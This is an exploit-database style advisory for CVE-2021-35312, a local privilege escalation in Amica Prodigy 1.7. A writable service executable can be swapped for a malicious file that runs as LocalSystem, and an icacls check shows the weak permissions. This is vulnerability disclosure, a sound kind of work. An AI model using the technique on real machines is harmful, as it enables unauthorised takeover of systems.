# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation  
# Date: 2021-08-06  
# Exploit Author: Andrea Intilangelo  
# Vendor Homepage: -  
# Software Link:  
# Version: 1.7  
# Tested on: Windows 10 Pro 20H2 x64  
# CVE: CVE-2021-35312  
Amica Prodigy it's a backup solution from Amica softwares (GestionaleAmica: invoices, accounting, etc.,  
from website, a CIR 2000 srl / Bisanzio Software srl  
A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable  
"RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it  
with a malicious file that will be executed with "LocalSystem" privileges at scheduled time.  
C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe  
NT AUTHORITY\Authenticated Users:(I)(M) NT  
AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F)  
BUILTIN\Users:(I)(RX) Elaborazione completata per 1 file.